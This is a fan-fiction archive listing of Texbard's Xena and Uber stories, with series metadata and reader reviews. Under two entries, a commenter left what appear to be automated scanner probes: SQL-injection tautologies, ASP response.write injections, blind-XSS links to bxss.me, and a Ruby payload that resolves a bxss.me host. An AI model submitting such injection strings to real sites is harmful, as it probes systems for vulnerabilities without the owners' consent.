1.01 - Looking for Trouble (post Sins of the Past) by
Xena | Alternative | Vignette | Very Short Story - 5 pages | Finished | Jun-05 Cast: Potadeia, Argo, Draco Links: The Academy Of Bards Part 1 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
These stories are wonderful. It's a nice way to get back to the series that started the whole thing. The bard does an amazing job of fleshing out X and G - giving them something extra - while still staying true to their characters. Do you miss the series?? Read these stories!!! - Gryphinn - Jun 9th, 2005 This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 Just recently viewed the series as I didn't watch it when it originally aired. Reading these between the shows stories adds wonderful depth to the series! Texbard is one of the greatest Xena / Gabrielle writers! - Deb S - May-07-2009 can't believe i didn't find this series sooner.. well, better late than never.. - Anonymous - Jun-05-2011 555 - sOdPqaAH - Sep-27-2024 555 - sOdPqaAH - Sep-27-2024 555 - sOdPqaAH - Sep-27-2024 5551s7vkjvw - sOdPqaAH - Sep-27-2024 555 - sOdPqaAH - Sep-27-2024 response.write(9230759*9630983) - sOdPqaAH - Sep-27-2024 HttP://bxss.me/t/xss.html?%00 - sOdPqaAH - Sep-27-2024 -1 OR 2+713-713-1=0+0+0+1 -- - sOdPqaAH - Sep-27-2024 '+response.write(9230759*9630983)+' - sOdPqaAH - Sep-27-2024 bxss.me/t/xss.html?%00 - sOdPqaAH - Sep-27-2024 -1 OR 2+223-223-1=0+0+0+1 - sOdPqaAH - Sep-27-2024 "+response.write(9230759*9630983)+" - sOdPqaAH - Sep-27-2024 -1' OR 2+887-887-1=0+0+0+1 -- - sOdPqaAH - Sep-27-2024 555 - sOdPqaAH - Sep-27-2024 <% response.write(9230759*9630983) %> - sOdPqaAH - Sep-27-2024 555 - sOdPqaAH - Sep-27-2024 -1' OR 3+256-256-1=0+0+0+1 or 'AGeZ1bXy'=' - sOdPqaAH - Sep-27-2024 555 - HttP://bxss.me/t/xss.html?%00 - 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1.02 - Finding Trees (post Chariots of War) by
Xena | Alternative | Vignette | Very Short Story - 5 pages | Finished | Jun-05 Cast: Xena, Darius, Lila, Perdicus Links: The Academy Of Bards Part 2 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 |
1.03 - Stones in the Pond (post Dreamworker) by
Xena | Alternative | Vignette | Very Short Story - 5 pages | Finished | Jun-05 Cast: Gabrielle, Elkton Links: The Academy Of Bards Part 3 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
555 - sOdPqaAH This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 awww.. really cute story.. - Anonymous - Jun-05-2011 555 - sOdPqaAH - Sep-27-2024 555 - sOdPqaAH - Sep-27-2024 555 - sOdPqaAH - Sep-27-2024 555loscZqz0 - sOdPqaAH - Sep-27-2024 555 - sOdPqaAH - Sep-27-2024 response.write(9015387*9622666) - sOdPqaAH - Sep-27-2024 HttP://bxss.me/t/xss.html?%00 - sOdPqaAH - Sep-27-2024 -1 OR 2+43-43-1=0+0+0+1 -- - sOdPqaAH - Sep-27-2024 '+response.write(9015387*9622666)+' - sOdPqaAH - Sep-27-2024 "+response.write(9015387*9622666)+" - sOdPqaAH - Sep-27-2024 -1 OR 2+577-577-1=0+0+0+1 - sOdPqaAH - Sep-27-2024 bxss.me/t/xss.html?%00 - sOdPqaAH - Sep-27-2024 -1' OR 2+353-353-1=0+0+0+1 -- - sOdPqaAH - Sep-27-2024 555 - sOdPqaAH - Sep-27-2024 <% response.write(9015387*9622666) %> - sOdPqaAH - Sep-27-2024 -1' OR 2+912-912-1=0+0+0+1 or 'WjSTXYxJ'=' - sOdPqaAH - Sep-27-2024 +response.write(9015387*9622666)' - sOdPqaAH - Sep-27-2024 555 - HttP://bxss.me/t/xss.html?%00 - Sep-27-2024 "+"A".concat(70-3).concat(22*4).concat(109).concat(76).concat(121).concat(69)+(require"socket" Socket.gethostbyname("hitju"+"xsiirzozd7d12.bxss.me.")[3].to_s)+" - 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1.04 - Teamwork (post Cradle of Hope) by
Xena | Alternative | Vignette | Very Short Story - 5 pages | Finished | Jun-05 Cast: Xena, Pandora, Gabriel, Gregor Links: The Academy Of Bards Part 4 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 |
1.05 - My Friend (post The Path Not Taken) by
Xena | Alternative | Vignette | Very Short Story - 5 pages | Finished | Jun-05 Cast: Gabrielle, Argo, Marcus Links: The Academy Of Bards Part 5 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 without benefits, up until now.. - Anonymous - Jun-05-2011 |
1.06 - Until Next Time (post The Reckoning) by
Xena | Alternative | Vignette | Very Short Story - 4 pages | Finished | Jun-05 Links: The Academy Of Bards Part 6 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 a deluded ares and a delightfull aphrodite.. just like it is in the show.. great job!! - Anonymous - Jun-05-2011 |
1.07 - The Virgin Goddess (post The Titans) by
Xena | Alternative | Vignette | Very Short Story - 4 pages | Finished | Jun-05 Links: The Academy Of Bards Part 7 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 i always interpreted xena's reaction to gabrielle's and phileus' interaction to be a mere protective act.. maybe she was jealous after all.. - Anonymous - Jun-05-2011 |
1.08 - Of Gods & Thunderbolts (post Prometheus) by
Xena | Alternative | Vignette | Very Short Story - 5 pages | Finished | Cast: Iolaus, Gabrielle Links: The Academy Of Bards Part 8 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. This is where you can see a slight change in the relationship. I love this series. - purplehawke - Jun-27-2008 |
1.09 - One for Death the Hard Way (post Death In Chains) by
Xena | Alternative | Vignette | Very Short Story - 5 pages | Finished | Links: The Academy Of Bards Part 9 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 tough imagining someone being so cleuless in this day and age.. but then again, they didn't "live" in our times, huh.. - Anonymous - Jun-05-2011 Really Good - Silver - Jun-11-2011 |
1.10 Fit for a Queen (post Hooves & Harlots) by
Xena | Alternative | Vignette | Very Short Story - 4 pages | Finished | Links: The Academy Of Bards Part 10 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 ah the insights of my favourite harlot.. uh, amazon.. - Anonymous - Jun-05-2011 |
1.11 - Influence (post The Black Wolf) by
Xena | Alternative | Vignette | Very Short Story - 5 pages | Finished | Cast: Gabrielle, Flora Links: The Academy Of Bards Part 11 of the Between the Lines Series Series List: 1.01 - Looking for Trouble (post Sins of the Past), 1.02 - Finding Trees (post Chariots of War), 1.03 - Stones in the Pond (post Dreamworker), 1.04 - Teamwork (post Cradle of Hope), 1.05 - My Friend (post The Path Not Taken), 1.06 - Until Next Time (post The Reckoning), 1.07 - The Virgin Goddess (post The Titans), 1.08 - Of Gods & Thunderbolts (post Prometheus), 1.09 - One for Death the Hard Way (post Death In Chains), 1.10 Fit for a Queen (post Hooves & Harlots), 1.11 - Influence (post The Black Wolf) | ![]() |
This is such a fabulous series and a nice behind the scenes look of what wasn't shown by the camera. I love this series. - purplehawke - Jun-27-2008 sorry to see that this was the last installment.. ever going to continue this series?? i, for one, certainly hope so.. - Anonymous - Jun-05-2011 go here, there's stories all the way through the 2nd season http://www.academyofbards.org/authors/texbard.html - Nicole - Jun-14-2011 |
Original / Uber | Modern | Alternative | Romance (alt) | Novel - 330 pages | Finished | Sep-07 Links: The Academy Of Bards Part 1 of the Kennedy And Carson Series Series List: Bluest Eyes in Texas (The), Soul Vessels, Rituals, To the Love of My Life, Short Oestra Story (A), Once Upon a Future Time, Borderline, Moondancer's Delight, Double Teamed | ![]() |
This is one of my all time favorite stories. And Linda is one of my favorite authors. This story is just so full of everything good. Hmm...I think I'll read it again. - GayNow (Car) - Feb-05-2008 A marvelous story. - Anonymous - May-04-2008 My fav Uber of ALL TIME. The best story out there. PLEASE do yourself a favor and read this. - Amanda - Dec-12-2008 Awesomest story ever!!! This is my 3rd time re-reading, sequels including. Absolutely fell in love with Kennedy even with her past. Can't get enough. Another sequel with be vvvvveeeeeeerrrrrryyyyyyyyyyyy appreciated :D Oh, and more thorough story on Isalba Cortez and Meg O'Brien!!!! Dang curious about them. - Sally - Apr-05-2009 CALLING ALL Newbies and Oldbies. ANYONE who has not read this story NEEDS to read it. It is one of the founding ubers of the Xenaverse. Beyond AMAZING! READ it!! You will not put it down. Again...READ IT!!!!!!!!! - Anonymous - Sep-06-2009 Talk about not wanting to put this one down... LOVE IT!!! READ IT!!! then READ it again! This is a Must Read! Enjoy... - Texas_wild - Nov-16-2009 I enjoyed this story from start to finish and could not put it down until I did finish it!! A true uber...extremely well written...truly one for the archives!!! - JC - Dec-20-2009 What a great story. A job well done - sassy123 - Sep-11-2010 If I didn't have had to work, sleep and eat I would've read the story in one sitting -- which I almost did. ;-) It's incredibly romantic, gripping, and contains more than one element of surprise...Very well written. *two thumbs up* - Anonymous - Oct-19-2010 I loved all the stories. This is my second time reading and I'm sure I'll be back again! - Bolly - Jan-02-2011 loved it.. - Anonymous - Jun-03-2011 Fantastic story really enjoyed this xx - SD - Dec-25-2015 |
Borderline by
Original / Uber | Modern | Alternative | Drama | Novel - 335 pages | Finished | Sep-07 Links: The Academy Of Bards Part 7 of the Kennedy And Carson Series Series List: Bluest Eyes in Texas (The), Soul Vessels, Rituals, To the Love of My Life, Short Oestra Story (A), Once Upon a Future Time, Borderline, Moondancer's Delight, Double Teamed | ![]() |
this story begins where "bluest eyes in texas" ended.. love the dynamics between the two main characters.. pity there is so much confusion when it comes to names: the dogs, cats and horses have all gotten different names.. but it doesn't stop there.. somewhere during the story tom becomes sam to be changed back into tom when the "real" sam makes a reappearance.. nevertheless, i highly recommend this story! - Anonymous - Jun-04-2011 |
Xena | Alternative | Drama | Novel - 410 pages | Finished | Sep-07 Links: The Academy Of Bards Part 3 of the Xena/Gabrielle Series Series List: March 16, Solstice Treaty (A), Cleopatra 4 A.D., Divinity, Eyes of Fire (The) | ![]() |
This story is the perfect example of why I love fan fiction.Next to a Friend in Need I hated the Cleo episode on Tv. Linda gets it right in this wonderfully erotic gem. - Anonymous - Apr-09-2011 |
Conqueror | Ancient | Alternative | Drama | Novella - 60 pages | Finished | Cast: Gabrielle, Xena, Iolaus, Ares, Sans, Argo Links: The Bards Corner @ AUSZIP | ![]() |
Can't believe so few people have rated this. It's a wonderful Conqueror story from a great author.IF YOU HAVEN'T ALREADY, PLEASE GIVE THIS A READ. - Anonymous - Dec-13-2010 completely different take on the conqueror story.. with a few surprising twists.. definitely worth the read!! - Anonymous - Jun-05-2011 Quick read, with lots of coolness. Enjoy! - ~M - Jun-26-2011 Good one - thanks for the recommendation. don't know how i missed this one. - colorado fan - Jul-01-2011 good story, sometimes even funny with the ever radiant 'dite winning the fun contest.. - xtra dog - Nov-01-2011 Nice twist to the normal conqueror stories! Although the ending was super sweet, I wish the author had drug this out into another story. This one makes me want to go back and watch XWP episodes. - Stacia - May-17-2017 |
Xena | Alternative | Romance (alt) | Short Story - 20 pages | Finished | Sep-07 Links: The Academy Of Bards | ![]() |
What an absolutely breathtakingly beautiful story. It was so real and so true to Xena and Gabrielle and very neatly tied together a whole bunch of pieces from the show. This is a fantastic read, well written and so sweet. I recommend it to everyone. - Anonymous - Mar-26-2009 This sooooo should have been an episode. Of course it would have had to be on HBO ;). Very nice communication and very HOT! - Xenamungrrr - Jul-30-2009 Nice story. I think the bard manage to bring the very essence of Xena and Gabrielle relationship in it. The result is lovely, sweet and kindda HOT! - yuka - Oct-12-2009 double thumbs up.. this story has such a high "awww" factor, it get's my breeches in a twist.. - Anonymous - Jun-05-2011 Don't know how I missed this one but I am so glad I found it.*****SPOILER ALLERT***** Texbard does an excellent job of explaining how Gab must have felt after finding out Xena was pregnant as well as how hard it was for Xena's pride to handle being protected by Gab. Very loving. - Stacia - Mar-27-2013 |
Divinity by
Xena | Alternative | Romance (alt) | Novella - 69 pages | Finished | Sep-07 Links: The Academy Of Bards Part 4 of the Xena/Gabrielle Series Series List: March 16, Solstice Treaty (A), Cleopatra 4 A.D., Divinity, Eyes of Fire (The) | ![]() |
I am not sure why no one has rated this before. It is a beautiful love story. I loved it! It was the best story of X & G's love I ever read! I hope the author finishes the the next two stories she is working on and they are even half as good as this one. - Starry - Sep-07-2008 I can't believe I'm only the second person to comment on this one. It's sweet, beautiful, and incredibly hot. Linda always writes Xena and Gabrielle well, but to keep to the characters when they are so intimate with each other... What can I say; the girl's got a gift. - Xenamungrrr - Mar-23-2009 Uhm, can I just say that this story rocks my socks? Texbard does Xena and Uber Xena to the highest degree, so if you haven't read her stuff yet you are most definately missing out. - IloveUbers - Jun-08-2009 Great story with a very tender & loving Xena.Gab is as always sweet & adorable. - Anonymous - Apr-09-2011 Absolutely amazing! I couldn't put it down! - Anonymous - Apr-22-2016 |
Original / Uber | Modern | Alternative | Romance (alt) | Short Story - 20 pages | Finished | Sep-07 Links: The Academy Of Bards Part 9 of the Kennedy And Carson Series Series List: Bluest Eyes in Texas (The), Soul Vessels, Rituals, To the Love of My Life, Short Oestra Story (A), Once Upon a Future Time, Borderline, Moondancer's Delight, Double Teamed | ![]() |
since i'm european, still living in europe, i don't know anything about american football.. don't know what all the craze is about, either.. sure enough, i do know who melissa good is.. nice to see some of her characters popping up in this story.. - Anonymous - Jun-05-2011 Great short story for a fast pick me up. Nice to see Kerry and Dar popping up in this one. My only complaint is that it ended. - Stacia - Nov-02-2012 |
Xena | Alternative | Romance (alt) | Novel - 355 pages | Finished | Sep-07 Links: The Academy Of Bards Part 5 of the Xena/Gabrielle Series Series List: March 16, Solstice Treaty (A), Cleopatra 4 A.D., Divinity, Eyes of Fire (The) | ![]() |
Fans of classical XWP stories should run to this series! Xena kicks butt, doesn't take names and broods while trying to love (and be loved by) Gab. Gab seemed a little wishy washy in this one to me, I prefer the stronger Gab from the first story in the series. This series is a definite must for Xena and Gab fans. - Stacia - May-30-2013 |
Xena | Alternative | Vignette | Very Short Story - 6 pages | Finished | Cast: Xena, Gabrielle | ![]() |
why has nobody commented on this story yet? i'd understand if it weren't any good, but this is an amazing story.. it paints a picture of how x&g slowly formed their friendship.. it is slow paced but that is exactly what the story needs.. very well written.. - xtra dog - Jun-10-2013 |
Original / Uber | 1900-1960 | Alternative | Drama | Novel - 326 pages | Finished | Cast: Mattie, Rachel, Adam, Lillie, Billy Links: The Academy Of Bards | ![]() |
Like the rest of her works, exceptional! A must read for any lover of romance. Thank you for sharing your talent and your beautiful story. - Anonymous - Aug 16th, 2004 This story deserves five stars! I read it months ago and I still think about it. I don't think many have taken the time to read this great and wonderfully written tale. ...You're truly missing out if you haven't. Cheers to Linda Christ. - B - Nov 13th, 2005 This story is AWESOME!! It takes a while to get through it, but believe me, it's worth it! I'll be checking other stories of this exceptional bard. Greetings - Bacchus - Jan 4th, 2006 This is one of my most favourite stories, which I come back to again and again. Linda Crist has a special way with words and has outdone herself with this novel. - filfil - Mar-12-2007 Wonderful story very well told, thank you for sharing it , A must read, enjoy the romance, the hardship endured, together with the history of the early 1900's will make you thank your blessings. - lizzie - Sep-23-2007 Fantastic story! Great characters, plot and a very realistic depiction of the times and of a tremendous tragedy. Read it--it's well worth it. - Micah6 - Mar-17-2008 This is a great story Texbard. I've read it a few times. Thought it appropriate to recommend again in light of the effects of "Ike" on this wonderful place. - Beth - Sep-13-2008 LOVED IT!!!!! - Rain - Mar-02-2009 This story is unforgettable! About the Galveston's storm in 1900, this story content romance, adventure and emotion,an awesome romance for the readers! - Leth Cross - Mar-15-2009 Despite the familiar back story, this novel is truly a masterpiece. Highly recommended! - BYL - Mar-16-2009 Definitely not your run of the mill cowboy story. There's a rich texture to the side characters and its the undertones in those interactions that make this such a great story. In fact, I wouldn't mind reading whole books just on the subplots and side characters alone. They are so charming. - Anonymous - Apr-05-2009 This is a wonderful story that has been told beautifully. As a born, bred, and raised Houstonian it has been told so well that it makes me miss Galveston. - Jennifer - Apr-25-2009 WAOUUUUU!!!! WONDERFUL STORY! i loved it - ophelie - May-19-2009 This has got to be one of my all time favorite stories. If you haven't read it, you're missing out! Thanks Linda for sharing your gift. - Peyton Andrews - Jan-09-2010 All I can say is WOW!! WOOHOOO!! Great!! - Anonymous - Jan-18-2010 Absolutely Fantastic!!! Wonderful... MUST READ.. WOW WOW WOW and so on!!! - Texas_wild - Jan-20-2010 wonderful romantic story. full of everything a good story needs. a must read. - ines - Jul-10-2010 Beautiful, beautiful story! Great job Texbard! - Anonymous - Jul-11-2010 This is a story that I've read online, bought the book, and recommend to all who will listen. Excellent story! - Lori V - Feb-09-2011 A must read story. It has everything you could want in a story; excitement, drama, love and passion. Highly recommended. - Lyn B - Feb-11-2011 great story by a wonderful author. Will there be a sequel? - Anonymous - Feb-12-2011 Suspense, drama, love, there is everthing in this story. I cried, I laughed and I hated. A really good one!!!! Take your time and read it. - GIA - Feb-16-2011 One of my all time favorite stories! - Justme - Jul-23-2011 I am really surprised this story does not have a higher rating. If you base your picks on ratings alone, you might miss out on a very good story. I did not know much about this era, was intrigued, did some research, and was pleasantly pleased. I give Texbard an A+ on her homework, for attention to detals of the real event, like the boys in the tree. This is very real and entertaining. well done. - Anonymous - Feb-17-2013 This story is AMAZING!!! It's hands down of my favorite uber characterizations of Xena and Gab I've read, especially the character Rachel. The true story of the hurricane grounds this story in reality while sweeping the reader away with epic romance. Read this immediately!!! - twins - May-25-2013 This is one of the best stories I've read. Based on a real event, this tale is very well told and written. Don't miss an interesting portrayal of a part of history you may never heard of. - Liv - Jul-07-2013 **** SPOILER ALERT **** OMG ! OMG ! Wow ! Right now I am taking a pause after the church scene, overwhelmed by emotions. Thank you for an extraordinary experience. Giving it a 10, and more if I could. Thank you, thank you. - orcsage - Apr-06-2015 Well I've finished 'Galveston 1900: Swept Away' and it's so good you don't want it to end, don't want to leave those friendly people, you know ! Very grateful to Texbard (Linda Crist) for such a wonderful story ! Rated 10 of course. - orcsage - Apr-09-2015 I's been 6 months since I read "Galveston 1900: Swept Away by Texbard (Linda Crist)" and I still get emotional , when random memories of 'Galveston' sometimes perk up without warning. Certainly one of the greatest stories I have ever read. Strongest recommendation and more. - orcsage - Oct-16-2015 |
March 16 by
Xena | Alternative | Drama | Novel - 280 pages | Finished | Sep-07 Links: The Academy Of Bards Part 1 of the Xena/Gabrielle Series Series List: March 16, Solstice Treaty (A), Cleopatra 4 A.D., Divinity, Eyes of Fire (The) | ![]() |
I can't believe I haven't rated this one before. My love for Linda Crist's writing started with this one. She truly is just a remarkable storyteller and treats the characters with utmost respect. One of the very best. - Xenamungrrr - Sep-08-2009 one of the best pieces of FF around! I love this series and love this author. - Anonymous - Feb-19-2010 Excellent read. I hope you have some time on your hands cause these are like Lays Potato Chips, you can't stop with just one. - MoSeS - Aug-26-2010 interesting read.. certainly interesting enough to read the follow ups.. - xtra dog - Jul-12-2011 Great start to a fantastic series! My favorite story of the series as well as my favorite post Ides of March story. Love Texbard's Xena and Gab! - Stacia - May-30-2013 |
Original / Uber | Modern | Alternative | Romance (alt) | Short Story - 19 pages | Finished | Sep-07 Links: The Academy Of Bards Part 8 of the Kennedy And Carson Series Series List: Bluest Eyes in Texas (The), Soul Vessels, Rituals, To the Love of My Life, Short Oestra Story (A), Once Upon a Future Time, Borderline, Moondancer's Delight, Double Teamed | ![]() |
this short story takes place right after "bluest eyes in texas" and right before "borderline".. nice introduction to two other characters by texbard.. - Anonymous - Jun-05-2011 |
Original / Uber | Modern | Alternative | Romance (alt) | Very Short Story - 6 pages | Finished | Sep-07 Links: The Academy Of Bards Part 6 of the Kennedy And Carson Series Series List: Bluest Eyes in Texas (The), Soul Vessels, Rituals, To the Love of My Life, Short Oestra Story (A), Once Upon a Future Time, Borderline, Moondancer's Delight, Double Teamed | ![]() |
love this series.. would love to see it continued.. - Anonymous - Jun-05-2011 love this series.. would love to see it continued.. - Anonymous - Jun-05-2011 okay.. third time i try to place a recommendation to this story.. maybe third is the lucky charm? love this series.. would love to see it continued.. - Anonymous - Jun-05-2011 |
Rituals by
Original / Uber | Modern | Alternative | Romance (alt) | Short Story - 16 pages | Finished | Sep-07 Links: The Academy Of Bards Part 3 of the Kennedy And Carson Series Series List: Bluest Eyes in Texas (The), Soul Vessels, Rituals, To the Love of My Life, Short Oestra Story (A), Once Upon a Future Time, Borderline, Moondancer's Delight, Double Teamed | ![]() |
Oh this was SOOOO good. PLEASE Linda expand this story! - Amanda - Dec-12-2008 please please write you novel about isalba and megan and let me know when it'll be published so that i can have a copy. - Anonymous - Jul-29-2009 and so the saga begins.. - Anonymous - Jun-03-2011 |
Original / Uber | Modern | Alternative | Romance (alt) | Very Short Story - 4 pages | Finished | Sep-07 Links: The Academy Of Bards Part 5 of the Kennedy And Carson Series Series List: Bluest Eyes in Texas (The), Soul Vessels, Rituals, To the Love of My Life, Short Oestra Story (A), Once Upon a Future Time, Borderline, Moondancer's Delight, Double Teamed | ![]() |
very romantic.. should read it prior to "to the love of my life", though.. - Anonymous - Jun-03-2011 |
Xena | Alternative | Drama | Novel - 250 pages | Finished | Sep-07 Links: The Academy Of Bards Part 2 of the Xena/Gabrielle Series Series List: March 16, Solstice Treaty (A), Cleopatra 4 A.D., Divinity, Eyes of Fire (The) | ![]() |
For Gab fans, this one is a must read. Gab comes into her own in this sequel. Lots of romance and tender scenes between Gab and Xena - a must read too for fans of romance. - Stacia - Mar-18-2014 |
Soul Vessels by
Original / Uber | Ancient | Alternative (Mature) | Horror | Short Story - 15 pages | Finished | Oct-03 Cast: Carson, Kennedy, Isalba, Meg Links: The Academy Of Bards Part 2 of the Kennedy And Carson Series Series List: Bluest Eyes in Texas (The), Soul Vessels, Rituals, To the Love of My Life, Short Oestra Story (A), Once Upon a Future Time, Borderline, Moondancer's Delight, Double Teamed | ![]() |
Kennedy Nocona is an attorney and Carson Garret is a paralegal. Carson moved from Dallas to Austin to live with Kennedy, after they met and fell in love. They first appeared in 'The Bluest Eyes in Texas.' This story is a stand-alone, and follows the girls on a beach outing that turns out to be very strange and eerily enlightening. | |
nice halloween story.. - Anonymous - Jun-03-2011 |
Original / Uber | Modern | Alternative (Mature) | Romance (alt) | Short Story - 10 pages | Finished | Cast: Kennedy, Carson Links: The Academy Of Bards Part 4 of the Kennedy And Carson Series Series List: Bluest Eyes in Texas (The), Soul Vessels, Rituals, To the Love of My Life, Short Oestra Story (A), Once Upon a Future Time, Borderline, Moondancer's Delight, Double Teamed | ![]() |
*sob*...so good *happy sob*....amazing - Anonymous - Dec 11th, 2005 nice FF piece.. - Anonymous - Jun-03-2011 |